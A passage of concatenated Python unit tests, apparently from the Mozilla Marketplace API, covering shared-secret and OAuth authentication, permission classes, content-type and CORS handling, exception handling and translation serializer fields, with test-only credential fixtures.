                            RestSharedSecretMiddleware]
        unpin_this_thread()

    def test_session_auth_query(self):
        # Credentials passed in the `_user` query parameter.
        req = RequestFactory().post(
            '/api/[email protected],56b6f1a3dd735d962c56ce7d8f46e02ec1d4748d'
            '2c00c407d75f0969d08bb9c68c31b3371aa8130317815c89e5072e31bb94b4121'
            'c5c165f3515838d4d6c60c4,165d631d3c3045458b4516242dad7ae')
        for m in self.middlewares:
            m().process_request(req)
        ok_(self.auth.authenticate(Request(req)))
        eq_(self.profile.pk, req.amo_user.pk)

    def test_failed_session_auth_query(self):
        req = RequestFactory().post('/api/?_user=bogus')
        for m in self.middlewares:
            m().process_request(req)
        ok_(not self.auth.authenticate(Request(req)))
        assert not getattr(req, 'amo_user', None)

    def test_session_auth(self):
        # Credentials passed in the Authorization header.
        req = RequestFactory().post(
            '/api/',
            HTTP_AUTHORIZATION='mkt-shared-secret '
                               '[email protected],56b6f1a3dd735d962c56'
                               'ce7d8f46e02ec1d4748d2c00c407d75f0969d08bb'
                               '9c68c31b3371aa8130317815c89e5072e31bb94b4'
                               '121c5c165f3515838d4d6c60c4,165d631d3c3045'
                               '458b4516242dad7ae')
        for m in self.middlewares:
            m().process_request(req)
        ok_(self.auth.authenticate(Request(req)))
        eq_(self.profile.pk, req.amo_user.pk)

    def test_failed_session_auth(self):
        req = RequestFactory().post(
            '/api/',
            HTTP_AUTHORIZATION='mkt-shared-secret bogus')
        for m in self.middlewares:
            m().process_request(req)
        ok_(not self.auth.authenticate(Request(req)))
        assert not getattr(req, 'amo_user', None)

    def test_session_auth_no_post(self):
        # No credentials at all: a pre-set request.user is not enough.
        req = RequestFactory().post('/api/')
        for m in self.middlewares:
            m().process_request(req)
        req.user = self.profile
        assert not self.auth.authenticate(Request(req))
@patch.object(settings, 'SECRET_KEY', 'gubbish')
class TestMultipleAuthenticationDRF(TestCase):
    """Stacking shared-secret and OAuth authenticators on a DRF Request must
    authenticate through whichever succeeds, and propagate the user onto the
    underlying Django request as well."""
    fixtures = fixture('user_2519')

    def setUp(self):
        self.profile = UserProfile.objects.get(pk=2519)

    def test_multiple_shared_works(self):
        request = RequestFactory().post(
            '/api',
            HTTP_AUTHORIZATION='mkt-shared-secret '
                               '[email protected],56b6f1a3dd735d962c56'
                               'ce7d8f46e02ec1d4748d2c00c407d75f0969d08bb'
                               '9c68c31b3371aa8130317815c89e5072e31bb94b4'
                               '121c5c165f3515838d4d6c60c4,165d631d3c3045'
                               '458b4516242dad7ae')
        drf_request = Request(request)
        # Start with an AnonymousUser on the request, because that's a classic
        # situation: we already went through a middleware, it didn't find a
        # session cookie, if set request.user = AnonymousUser(), and now we
        # are going through the authentication code in the API.
        request.user = AnonymousUser()
        # Call middleware as they would normally be called.
        RedirectPrefixedURIMiddleware().process_request(request)
        RestSharedSecretMiddleware().process_request(request)
        RestOAuthMiddleware().process_request(request)
        drf_request.authenticators = (
            authentication.RestSharedSecretAuthentication(),
            authentication.RestOAuthAuthentication())
        # Both the DRF request and the wrapped Django request must end up
        # with the authenticated profile and amo_user.
        eq_(drf_request.user, self.profile)
        eq_(drf_request._request.user, self.profile)
        eq_(drf_request.user.is_authenticated(), True)
        eq_(drf_request._request.user.is_authenticated(), True)
        eq_(drf_request.amo_user.pk, self.profile.pk)
        eq_(drf_request._request.amo_user.pk, self.profile.pk)

    def test_multiple_fail(self):
        # No credentials: every authenticator fails, user stays anonymous.
        request = RequestFactory().post('/api')
        drf_request = Request(request)
        request.user = AnonymousUser()
        drf_request.authenticators = (
            authentication.RestSharedSecretAuthentication(),
            authentication.RestOAuthAuthentication())
        eq_(drf_request.user.is_authenticated(), False)
        eq_(drf_request._request.user.is_authenticated(), False)
########NEW FILE########
__FILENAME__ = test_authorization
from django.contrib.auth.models import AnonymousUser
from rest_framework.permissions import AllowAny, BasePermission
from mock import Mock
from nose.tools import eq_, ok_
from test_utils import RequestFactory
from amo.tests import TestCase
from users.models import UserProfile
from mkt.api.authorization import (AllowAuthor, AllowAppOwner, AllowNone,
AllowOwner, AllowRelatedAppOwner,
AllowReadOnlyIfPublic, AllowSelf, AnyOf,
ByHttpMethod, flag, GroupPermission, switch)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
class TestWaffle(TestCase):
    """The flag()/switch() permission factories must grant access only when
    the corresponding waffle flag or switch exists and is active."""

    def setUp(self):
        super(TestWaffle, self).setUp()
        self.request = RequestFactory().get('/')

    def test_waffle_flag(self):
        self.create_flag('foo')
        ok_(flag('foo')().has_permission(self.request, ''))

    def test_not_waffle_flag(self):
        # Flag was never created: permission denied.
        ok_(not flag('foo')().has_permission(self.request, ''))

    def test_waffle_switch(self):
        self.create_switch('foo')
        ok_(switch('foo')().has_permission(self.request, ''))

    def test_not_switch_flag(self):
        # Switch was never created: permission denied.
        ok_(not switch('foo')().has_permission(self.request, ''))
class TestAllowSelfAuthorization(TestCase):
    """AllowSelf must grant object access only to the user the object
    represents; anonymous and other users are denied."""
    fixtures = fixture('user_2519', 'user_999')

    def setUp(self):
        self.permission = AllowSelf()
        self.anonymous = AnonymousUser()
        self.user = UserProfile.objects.get(pk=2519)
        self.request = RequestFactory().get('/')
        self.request.user = self.anonymous
        self.request.amo_user = None

    def test_has_permission_anonymous(self):
        eq_(self.permission.has_permission(self.request, 'myview'), False)

    def test_has_permission_user(self):
        self.request.amo_user = self.request.user = self.user
        eq_(self.permission.has_permission(self.request, 'myview'), True)

    def test_has_object_permission_anonymous(self):
        eq_(self.permission.has_object_permission(
            self.request, 'myview', self.user), False)

    def test_has_object_permission_user(self):
        # The object is the requesting user's own profile: allowed.
        self.request.amo_user = self.request.user = self.user
        obj = self.user
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            True)

    def test_has_object_permission_different_user(self):
        # The object belongs to someone else: denied.
        self.request.user = UserProfile.objects.get(pk=999)
        self.request.amo_user = self.request.user
        obj = self.user
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            False)
class TestAllowOwner(TestCase):
    """AllowOwner must grant object access only when the object's `user`
    matches the requesting user."""
    fixtures = fixture('user_2519', 'user_999')

    def setUp(self):
        self.permission = AllowOwner()
        self.anonymous = AnonymousUser()
        self.user = UserProfile.objects.get(pk=2519)
        self.request = RequestFactory().get('/')
        self.request.user = self.anonymous
        self.request.amo_user = None

    def test_has_permission_anonymous(self):
        eq_(self.permission.has_permission(self.request, 'myview'), False)

    def test_has_permission_user(self):
        self.request.user = self.user
        self.request.amo_user = self.request.user
        eq_(self.permission.has_permission(self.request, 'myview'), True)

    def test_has_object_permission_user(self):
        self.request.user = self.user
        self.request.amo_user = self.request.user
        obj = Mock()
        obj.user = self.user
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            True)

    def test_has_object_permission_different_user(self):
        self.request.user = UserProfile.objects.get(pk=999)
        self.request.amo_user = self.request.user
        obj = Mock()
        # NOTE(review): this sets obj.pk, while the sibling test sets
        # obj.user — possibly a typo for `obj.user = self.user`. The Mock's
        # auto-generated obj.user still differs from the requester, so the
        # denial assertion passes either way; confirm the intent.
        obj.pk = self.user.pk
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            False)
class PartialFailPermission(BasePermission):
    """Test double: passes the view-level check (inherited default) but
    always fails the object-level check."""

    def has_object_permission(self, request, view, obj):
        return False
class FailPartialPermission(BasePermission):
    """Test double: always fails the view-level check (object-level check
    keeps the inherited default)."""

    def has_permission(self, request, view):
        return False
class TestAnyOf(TestCase):
    """AnyOf must grant access when at least one wrapped permission grants
    it, regardless of order, and deny when none do — including when one
    passes only the view-level and the other only the object-level check."""

    def test_has_permission(self):
        request = RequestFactory().get('/')
        ok_(AnyOf(AllowNone, AllowAny)().has_permission(
            request, 'myview'))
        ok_(AnyOf(AllowAny, AllowNone)().has_permission(
            request, 'myview'))

    def test_has_permission_fail(self):
        request = RequestFactory().get('/')
        ok_(not AnyOf(AllowNone, AllowNone)().has_permission(
            request, 'myview'))

    def test_has_object_permission(self):
        request = RequestFactory().get('/')
        ok_(AnyOf(AllowNone, AllowAny
                  )().has_object_permission(request, 'myview', None))
        ok_(AnyOf(AllowAny, AllowNone
                  )().has_object_permission(request, 'myview', None))

    def test_has_object_permission_fail(self):
        request = RequestFactory().get('/')
        ok_(not AnyOf(AllowNone, AllowNone
                      )().has_object_permission(request, 'myview', None))

    def test_has_object_permission_partial_fail(self):
        # One permission fails has_permission, the other fails
        # has_object_permission: neither fully grants, so AnyOf denies.
        request = RequestFactory().get('/')
        ok_(not AnyOf(FailPartialPermission, PartialFailPermission
                      )().has_object_permission(request, 'myview', None))
class TestAllowNone(TestCase):
    """AllowNone must deny both view-level and object-level access for
    anonymous and authenticated users alike."""

    def setUp(self):
        self.permission = AllowNone()
        self.anonymous = AnonymousUser()
        self.user = UserProfile()
        self.request = RequestFactory().get('/')
        self.request.user = self.anonymous
        self.request.amo_user = None

    def test_has_permission_anonymous(self):
        eq_(self.permission.has_permission(self.request, 'myview'), False)

    def test_has_permission_user(self):
        self.request.user = Mock()
        # Fixed typo: was `self.request_amo_user = Mock()`, which set an
        # attribute on the test case instead of on the request.
        self.request.amo_user = Mock()
        eq_(self.permission.has_permission(self.request, 'myview'), False)

    def test_has_object_permission_anonymous(self):
        obj = Mock()
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            False)

    def test_has_object_permission_user(self):
        self.request.user = Mock()
        # Fixed typo: see test_has_permission_user.
        self.request.amo_user = Mock()
        obj = Mock()
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            False)
class TestAllowAppOwner(TestCase):
    """AllowAppOwner must grant object access on an app only to one of its
    authors; other users and anonymous requests are denied."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        self.app = Webapp.objects.get(pk=337141)
        self.permission = AllowAppOwner()
        self.anonymous = AnonymousUser()
        self.owner = self.app.authors.all()[0]
        self.request = RequestFactory().get('/')
        self.request.user = self.anonymous
        self.request.amo_user = None

    def test_has_permission_anonymous(self):
        eq_(self.permission.has_permission(self.request, 'myview'), False)

    def test_has_permission_user(self):
        self.request.user = self.owner
        self.request.amo_user = self.owner
        eq_(self.permission.has_permission(self.request, 'myview'), True)

    def test_has_object_permission_user(self):
        self.request.user = self.owner
        self.request.amo_user = self.owner
        obj = self.app
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            True)

    def test_has_object_permission_different_user(self):
        # pk=2519 is not among the app's authors (fixture user).
        self.request.user = UserProfile.objects.get(pk=2519)
        self.request.amo_user = self.request.user
        obj = self.app
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            False)

    def test_has_object_permission_anonymous(self):
        obj = self.app
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            False)
class TestAllowRelatedAppOwner(TestCase):
    """AllowRelatedAppOwner must grant access to objects whose `addon`
    points at an app the requesting user authored."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        self.app = Webapp.objects.get(pk=337141)
        self.permission = AllowRelatedAppOwner()
        self.anonymous = AnonymousUser()
        self.owner = self.app.authors.all()[0]
        self.request = RequestFactory().get('/')
        self.request.user = self.anonymous
        self.request.amo_user = None

    def test_has_permission_anonymous(self):
        eq_(self.permission.has_permission(self.request, 'myview'), False)

    def test_has_permission_user(self):
        self.request.user = self.owner
        self.request.amo_user = self.owner
        eq_(self.permission.has_permission(self.request, 'myview'), True)

    def test_has_object_permission_user(self):
        self.request.user = self.owner
        self.request.amo_user = self.owner
        # The object itself is arbitrary; only its `addon` link matters.
        obj = Mock()
        obj.addon = self.app
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            True)

    def test_has_object_permission_different_user(self):
        self.request.user = UserProfile.objects.get(pk=2519)
        self.request.amo_user = self.request.user
        obj = Mock()
        obj.addon = self.app
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            False)
class TestAllowAuthor(TestCase):
    """AllowAuthor must grant access only when request.amo_user is in the
    author list the view exposes via get_authors()."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        self.permission = AllowAuthor()
        app = Webapp.objects.get(pk=337141)
        self.authors = app.authors.all()
        # The permission queries the view for the authors, so stub that.
        self.view = Mock()
        self.view.get_authors.return_value = self.authors

    def create_request(self, user_profile):
        request = RequestFactory().get('/')
        request.amo_user = user_profile
        return request

    def test_has_permission_anonymous(self):
        request = self.create_request(user_profile=None)
        eq_(self.permission.has_permission(request, self.view), False)

    def test_has_permission_user(self):
        request = self.create_request(user_profile=self.authors[0])
        eq_(self.permission.has_permission(request, self.view), True)

    def test_has_permission_different_user(self):
        other_user_profile = UserProfile.objects.get(pk=2519)
        request = self.create_request(user_profile=other_user_profile)
        eq_(self.permission.has_permission(request, self.view), False)
class TestAllowReadOnlyIfPublic(TestCase):
    """AllowReadOnlyIfPublic must allow only safe HTTP methods, and only on
    objects whose is_public() returns True."""

    def setUp(self):
        self.permission = AllowReadOnlyIfPublic()
        self.anonymous = AnonymousUser()
        self.request_factory = RequestFactory()
        # 'patch' is missing because it's absent from RequestFactory in
        # django < 1.5. Usually we don't special case 'put' vs 'patch' in
        # permissions code though, so it's fine.
        self.unsafe_methods = ('post', 'put', 'delete')
        self.safe_methods = ('get', 'options', 'head')

    def _request(self, verb):
        """Build an anonymous request using the given HTTP verb."""
        request = getattr(self.request_factory, verb)('/')
        request.user = self.anonymous
        request.amo_user = None
        return request

    def test_has_permission(self):
        for verb in self.safe_methods:
            eq_(self.permission.has_permission(self._request(verb), 'myview'),
                True)
        for verb in self.unsafe_methods:
            eq_(self.permission.has_permission(self._request(verb), 'myview'),
                False)

    def test_has_object_permission_public(self):
        obj = Mock()
        obj.is_public.return_value = True
        for verb in self.safe_methods:
            eq_(self.permission.has_object_permission(self._request(verb),
                                                      'myview', obj), True)
        for verb in self.unsafe_methods:
            eq_(self.permission.has_object_permission(self._request(verb),
                                                      'myview', obj), False)

    def test_has_object_permission_not_public(self):
        # Non-public object: every verb, safe or not, is denied.
        obj = Mock()
        obj.is_public.return_value = False
        for verb in (self.unsafe_methods + self.safe_methods):
            eq_(self.permission.has_object_permission(self._request(verb),
                                                      'myview', obj), False)
class TestGroupPermission(TestCase):
    """GroupPermission('Drinkers', 'Beer') must grant access only to users
    holding exactly that ACL permission; a sibling permission under the same
    app ('Drinkers:Scotch') is not enough."""
    fixtures = fixture('user_2519')

    def setUp(self):
        self.permission = GroupPermission('Drinkers', 'Beer')
        self.obj = Mock()
        self.profile = UserProfile.objects.get(pk=2519)
        self.anonymous = AnonymousUser()
        self.request = RequestFactory().get('/')
        self.request.user = self.anonymous

    def test_has_permission_user_without(self):
        self.request.user = self.profile
        self.request.amo_user = self.profile
        self.request.groups = self.profile.groups.all()
        # Grant a different permission under the same app: still denied.
        self.grant_permission(self.profile, 'Drinkers:Scotch')
        eq_(self.permission.has_permission(self.request, 'myview'), False)

    def test_has_permission_user_with(self):
        self.request.user = self.profile
        self.request.amo_user = self.profile
        self.request.groups = self.profile.groups.all()
        self.grant_permission(self.profile, 'Drinkers:Beer')
        eq_(self.permission.has_permission(self.request, 'myview'), True)

    def test_has_permission_anonymous(self):
        eq_(self.permission.has_permission(self.request, 'myview'), False)

    def test_has_object_permission_user_without(self):
        self.request.user = self.profile
        self.request.amo_user = self.profile
        self.request.groups = self.profile.groups.all()
        self.grant_permission(self.profile, 'Drinkers:Scotch')
        obj = Mock()
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            False)

    def test_has_object_permission_user_with(self):
        self.request.user = self.profile
        self.request.amo_user = self.profile
        self.request.groups = self.profile.groups.all()
        self.grant_permission(self.profile, 'Drinkers:Beer')
        obj = Mock()
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            True)

    def test_has_object_permission_anonymous(self):
        obj = Mock()
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            False)
class TestByHttpMethodPermission(TestCase):
    """ByHttpMethod must dispatch permission checks to the class registered
    for the request's HTTP method and deny any unregistered method."""

    def setUp(self):
        # NOTE(review): these attributes hold the Mock *class* (not an
        # instance); only 'get' is actually registered below, the other
        # three are unused here — presumably ByHttpMethod instantiates the
        # class itself. Confirm against the ByHttpMethod implementation.
        self.get_permission = Mock
        self.patch_permission = Mock
        self.post_permission = Mock
        self.put_permission = Mock
        self.permission = ByHttpMethod({
            'get': self.get_permission,
        })
        self.set_permission_mock('get', True)

    def set_permission_mock(self, method, value):
        """Force the has_permission() result for the given method."""
        mock = self.permission.method_permissions[method]
        mock.has_permission.return_value = value

    def set_object_permission_mock(self, method, value):
        """Force the has_object_permission() result for the given method."""
        mock = self.permission.method_permissions[method]
        mock.has_object_permission.return_value = value

    def test_get(self):
        self.request = RequestFactory().get('/')
        eq_(self.permission.has_permission(self.request, 'myview'), True)
        self.set_permission_mock('get', False)
        eq_(self.permission.has_permission(self.request, 'myview'), False)

    def test_get_obj(self):
        obj = Mock()
        self.request = RequestFactory().get('/')
        self.set_object_permission_mock('get', True)
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            True)
        self.set_object_permission_mock('get', False)
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            False)

    def test_missing_method(self):
        # POST and OPTIONS were never registered: both checks must deny.
        self.request = RequestFactory().post('/')
        eq_(self.permission.has_permission(self.request, 'myview'), False)
        obj = Mock()
        self.request = RequestFactory().post('/')
        eq_(self.permission.has_object_permission(self.request, 'myview', obj),
            False)
        self.request = RequestFactory().options('/')
        eq_(self.permission.has_permission(self.request, 'myview'), False)
########NEW FILE########
__FILENAME__ = test_base
import urllib
from django import forms
from django.core.urlresolvers import reverse
from mock import patch
from nose.tools import eq_
from rest_framework.decorators import (authentication_classes,
permission_classes)
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from test_utils import RequestFactory
from amo.tests import TestCase
from mkt.api.base import cors_api_view, SubRouterWithFormat
from mkt.api.tests.test_oauth import RestOAuth
from mkt.webapps.views import AppViewSet
class URLRequestFactory(RequestFactory):
    """RequestFactory that form-urlencodes the request body regardless of
    the declared content type."""

    def _encode_data(self, data, content_type):
        return urllib.urlencode(data)
class TestEncoding(RestOAuth):
    """Content-type / Accept handling of the API endpoints: unsupported
    content types give 415, malformed JSON gives 400, and form-encoded
    bodies are parsed into request.DATA."""

    def test_blah_encoded(self):
        """
        Regression test of bug #858403: ensure that a 415 (and not 500) is
        raised when an unsupported Content-Type header is passed to an API
        endpoint.
        """
        r = self.client.post(reverse('app-list'),
                             CONTENT_TYPE='application/blah',
                             data='cvan was here')
        eq_(r.status_code, 415)

    def test_bad_json(self):
        r = self.client.post(reverse('app-list'),
                             CONTENT_TYPE='application/json',
                             data="not ' json ' 5")
        eq_(r.status_code, 400)

    def test_not_json(self):
        r = self.client.get(reverse('app-list'),
                            HTTP_ACCEPT='application/blah')
        # We should return a 406, but for endpoints that only accept JSON, we
        # cheat and return json content without even looking at the Accept
        # header (see mkt.api.renderers and settings).
        eq_(r.status_code, 200)
        eq_(r['content-type'], 'application/json')

    @patch.object(AppViewSet, 'create')
    def test_form_encoded(self, create_mock):
        # The mocked create() receives the DRF request as its first arg.
        create_mock.return_value = Response()
        self.client.post(reverse('app-list'),
                         data='foo=bar',
                         content_type='application/x-www-form-urlencoded')
        eq_(create_mock.call_args[0][0].DATA['foo'], 'bar')
class TestCORSWrapper(TestCase):
    """cors_api_view must record the allowed methods on request.CORS so the
    CORS middleware can emit the right headers."""

    def test_cors(self):
        @cors_api_view(['GET', 'PATCH'])
        @authentication_classes([])
        @permission_classes([])
        def foo(request):
            return Response()
        request = RequestFactory().get('/')
        foo(request)
        eq_(request.CORS, ['GET', 'PATCH'])
class Form(forms.Form):
    """Minimal form used by the tests below; 'valid' is its only accepted
    value for `app`."""
    app = forms.ChoiceField(choices=(('valid', 'valid'),))
class TestSubRouterWithFormat(TestCase):
    """SubRouterWithFormat must generate, for each route, both the plain URL
    and a `.format` suffixed variant, with and without trailing slashes."""

    def test_format_is_included(self):
        router = SubRouterWithFormat()
        router.register('foo', ModelViewSet, base_name='bar')
        # NOTE(review): the first two expected patterns are identical for
        # bar-list and bar-detail — looks like a copy-paste; this pins the
        # router's current output, confirm it is intentional.
        expected = [
            {'name': 'bar-list', 'pattern': '^(?P<pk>[^/]+)/foo/$'},
            {'name': 'bar-detail', 'pattern': '^(?P<pk>[^/]+)/foo/$'},
            {'name': 'bar-list',
             'pattern': '^(?P<pk>[^/.]+)/foo\\.(?P<format>[a-z0-9]+)$'},
            {'name': 'bar-detail',
             'pattern': '^(?P<pk>[^/.]+)/foo\\.(?P<format>[a-z0-9]+)$'},
        ]
        actual = [{
            'name': url.name, 'pattern': url.regex.pattern
        } for url in router.urls]
        for i, _ in enumerate(expected):
            eq_(actual[i], expected[i])

    def test_format_is_included_no_trailing_slashes(self):
        router = SubRouterWithFormat(trailing_slash=False)
        router.register('foo', ModelViewSet, base_name='bar')
        expected = [
            {'name': 'bar-list', 'pattern': '^(?P<pk>[^/.]+)/foo$'},
            {'name': 'bar-detail', 'pattern': '^(?P<pk>[^/.]+)/foo$'},
            {'name': 'bar-list',
             'pattern': '^(?P<pk>[^/.]+)/foo\\.(?P<format>[a-z0-9]+)$'},
            {'name': 'bar-detail',
             'pattern': '^(?P<pk>[^/.]+)/foo\\.(?P<format>[a-z0-9]+)$'},
        ]
        actual = [{
            'name': url.name, 'pattern': url.regex.pattern
        } for url in router.urls]
        for i, _ in enumerate(expected):
            eq_(actual[i], expected[i])
########NEW FILE########
__FILENAME__ = test_exceptions
from mkt.api.exceptions import custom_exception_handler
from nose.tools import raises
from rest_framework.response import Response
from test_utils import TestCase
class TestExceptionHandler(TestCase):
    """custom_exception_handler must convert exceptions into Responses
    normally, but re-raise them when DEBUG_PROPAGATE_EXCEPTIONS is on."""

    def test_response(self):
        try:
            1/0
        except Exception as exc:
            assert isinstance(custom_exception_handler(exc), Response)

    @raises(ZeroDivisionError)
    def test_raised(self):
        # With DEBUG_PROPAGATE_EXCEPTIONS set, the handler must re-raise.
        with self.settings(DEBUG_PROPAGATE_EXCEPTIONS=True):
            try:
                1/0
            except Exception as exc:
                custom_exception_handler(exc)
########NEW FILE########
__FILENAME__ = test_fields
# -*- coding: utf-8 -*-
from mock import Mock
from nose.tools import eq_, ok_
from rest_framework.request import Request
from rest_framework.serializers import CharField, Serializer
from rest_framework.test import APIRequestFactory
from test_utils import RequestFactory
import amo
from amo.tests import TestCase
from addons.models import AddonCategory, Category
from mkt.api.fields import (ESTranslationSerializerField,
SlugOrPrimaryKeyRelatedField, SplitField,
TranslationSerializerField)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from versions.models import Version
from translations.models import Translation
class _TestTranslationSerializerField(object):
field_class = TranslationSerializerField
def setUp(self):
super(_TestTranslationSerializerField, self).setUp()
self.factory = APIRequestFactory()
self.app = Webapp.objects.get(pk=337141)
def _test_expected_dict(self, field):
result = field.field_to_native(self.app, 'name')
expected = {
'en-US': unicode(Translation.objects.get(id=self.app.name.id,
locale='en-US')),
'es': unicode(Translation.objects.get(id=self.app.name.id,
locale='es')),
}
eq_(result, expected)
result = field.field_to_native(self.app, 'description')
expected = {
'en-US': Translation.objects.get(id=self.app.description.id,
locale='en-US'),
}
eq_(result, expected)
def _test_expected_single_string(self, field):
result = field.field_to_native(self.app, 'name')
expected = unicode(self.app.name)
eq_(result, expected)
result = field.field_to_native(self.app, 'description')
expected = unicode(self.app.description)
eq_(result, expected)
def test_from_native(self):
data = u'Translatiön'
field = self.field_class()
result = field.from_native(data)
eq_(result, data)
data = {
'fr': u'Non mais Allô quoi !',
'en-US': u'No But Hello what!'
}
field = self.field_class()
result = field.from_native(data)
eq_(result, data)
data = ['Bad Data']
field = self.field_class()
result = field.from_native(data)
eq_(result, unicode(data))
def test_field_from_native_strip(self):
data = {
'fr': u' Non mais Allô quoi ! ',
'en-US': u''
}
field = self.field_class()
result = field.from_native(data)
eq_(result, {'fr': u'Non mais Allô quoi !', 'en-US': u''})
def test_field_to_native(self):
field = self.field_class()
self._test_expected_dict(field)
def test_field_to_native_source(self):
self.app.mymock = Mock()
self.app.mymock.mymocked_field = self.app.name
field = self.field_class(source='mymock.mymocked_field')
result = field.field_to_native(self.app, 'shouldbeignored')
expected = {
'en-US': unicode(Translation.objects.get(id=self.app.name.id,
locale='en-US')),
'es': unicode(Translation.objects.get(id=self.app.name.id,
locale='es')),
}
eq_(result, expected)
def test_field_to_native_empty_context(self):
mock_serializer = Serializer()
mock_serializer.context = {}
field = self.field_class()
field.initialize(mock_serializer, 'name')
self._test_expected_dict(field)
def test_field_to_native_request_POST(self):
request = Request(self.factory.post('/'))
mock_serializer = Serializer()
mock_serializer.context = {'request': request}
field = self.field_class()
field.initialize(mock_serializer, 'name')
self._test_expected_dict(field)
def test_field_to_native_request_GET(self):
request = Request(self.factory.get('/'))
mock_serializer = Serializer()
mock_serializer.context = {'request': request}
field = self.field_class()
field.initialize(mock_serializer, 'name')
self._test_expected_dict(field)
    def test_field_to_native_request_GET_lang(self):
        """
        Pass a lang in the query string, expect to have a single string
        returned instead of an object.
        """
        # Note that we don't go through the middlewares etc so the actual
        # language for the process isn't changed, we don't care as
        # _expect_single_string() method simply tests with the current language,
        # whatever it is.
        request = Request(self.factory.get('/', {'lang': 'lol'}))
        # Sanity-check that the query parameter survived DRF's Request wrap.
        eq_(request.GET['lang'], 'lol')
        mock_serializer = Serializer()
        mock_serializer.context = {'request': request}
        field = self.field_class()
        field.initialize(mock_serializer, 'name')
        self._test_expected_single_string(field)
def test_field_null(self):
field = self.field_class()
self.app = Webapp()
result = field.field_to_native(self.app, 'name')
eq_(result, None)
result = field.field_to_native(self.app, 'description')
eq_(result, None)
class TestTranslationSerializerField(_TestTranslationSerializerField, TestCase):
    # Database-backed variant of the shared translation-field test mixin.
    fixtures = fixture('user_2519', 'webapp_337141')
class TestESTranslationSerializerField(_TestTranslationSerializerField, TestCase):
    """Variant of the shared tests for the Elasticsearch-backed field, which
    reads pre-attached `<name>_translations` dicts instead of the DB."""
    field_class = ESTranslationSerializerField
    def setUp(self):
        self.factory = APIRequestFactory()
        self.app = Webapp()
        self.app.default_locale = 'en-US'
        self.app.name_translations = {
            'en-US': u'English Name',
            'es': u'Spànish Name'
        }
        self.app.description_translations = {
            'en-US': u'English Description',
            'fr': u'Frençh Description'
        }
    def test_attach_translations(self):
        # attach_translations() converts a list of {lang, string} dicts (the
        # ES document shape) into a locale->string mapping on the object.
        data = {
            'foo_translations' : [{
                'lang': 'testlang',
                'string': 'teststring'
            }, {
                'lang': 'testlang2',
                'string': 'teststring2'
            }]
        }
        self.app = Webapp()
        self.field_class().attach_translations(self.app, data, 'foo')
        eq_(self.app.foo_translations, {'testlang': 'teststring',
                                        'testlang2': 'teststring2'})
    def test_attach_translations_target_name(self):
        # The mapping can be stored under a different attribute name than the
        # source key via `target_name`.
        data = {
            'foo_translations' : [{
                'lang': 'testlang',
                'string': 'teststring'
            }, {
                'lang': 'testlang2',
                'string': 'teststring2'
            }]
        }
        self.app = Webapp()
        self.field_class().attach_translations(self.app, data, 'foo',
                                               target_name='bar')
        eq_(self.app.bar_translations, {'testlang': 'teststring',
                                        'testlang2': 'teststring2'})
    def test_attach_translations_missing_key(self):
        # A None/missing source value attaches an empty dict, not None.
        data = {
            'foo_translations': None
        }
        self.app = Webapp()
        self.field_class().attach_translations(self.app, data, 'foo')
        eq_(self.app.foo_translations, {})
    def _test_expected_dict(self, field):
        # Override of the mixin helper: expectations come from the attached
        # *_translations dicts rather than Translation rows.
        result = field.field_to_native(self.app, 'name')
        expected = self.app.name_translations
        eq_(result, expected)
        result = field.field_to_native(self.app, 'description')
        expected = self.app.description_translations
        eq_(result, expected)
    def _test_expected_single_string(self, field):
        result = field.field_to_native(self.app, 'name')
        expected = unicode(self.app.name_translations['en-US'])
        eq_(result, expected)
        result = field.field_to_native(self.app, 'description')
        expected = unicode(self.app.description_translations['en-US'])
        eq_(result, expected)
    def test_field_to_native_source(self):
        self.app.mymock = Mock()
        self.app.mymock.mymockedfield_translations = self.app.name_translations
        field = self.field_class(source='mymock.mymockedfield')
        result = field.field_to_native(self.app, 'shouldbeignored')
        expected = self.app.name_translations
        eq_(result, expected)
    def test_field_null(self):
        # Both an empty dict and None serialize to None.
        field = self.field_class()
        self.app.name_translations = {}
        result = field.field_to_native(self.app, 'name')
        eq_(result, None)
        self.app.description_translations = None
        result = field.field_to_native(self.app, 'description')
        eq_(result, None)
class SlugOrPrimaryKeyRelatedFieldTests(TestCase):
    """SlugOrPrimaryKeyRelatedField renders either pks or slugs (depending on
    `render_as`) and accepts either form on input."""
    fixtures = fixture('webapp_337141')
    def test_render_as_pks(self):
        app = Webapp.objects.get(pk=337141)
        c1 = Category.objects.create(name='delicious', slug='foo',
                                     type=amo.ADDON_WEBAPP)
        c2 = Category.objects.create(name='scrumptious', slug='baz',
                                     type=amo.ADDON_WEBAPP)
        AddonCategory.objects.create(addon=app, category=c1)
        AddonCategory.objects.create(addon=app, category=c2)
        field = SlugOrPrimaryKeyRelatedField(queryset=Category.objects.all(),
                                             many=True)
        eq_(field.field_to_native(app, 'categories'), [c1.pk, c2.pk])
    def test_render_as_pk(self):
        v = Version.objects.get(pk=1268829)
        field = SlugOrPrimaryKeyRelatedField(queryset=Webapp.objects.all())
        eq_(field.field_to_native(v, 'addon'), v.addon.pk)
    def test_parse_as_pks(self):
        c1 = Category.objects.create(name='delicious', slug='foo',
                                     type=amo.ADDON_WEBAPP)
        c2 = Category.objects.create(name='scrumptious', slug='baz',
                                     type=amo.ADDON_WEBAPP)
        into = {}
        field = SlugOrPrimaryKeyRelatedField(queryset=Category.objects.all(),
                                             many=True)
        field.field_from_native({'categories': [c1.pk, c2.pk]}, None,
                                'categories', into)
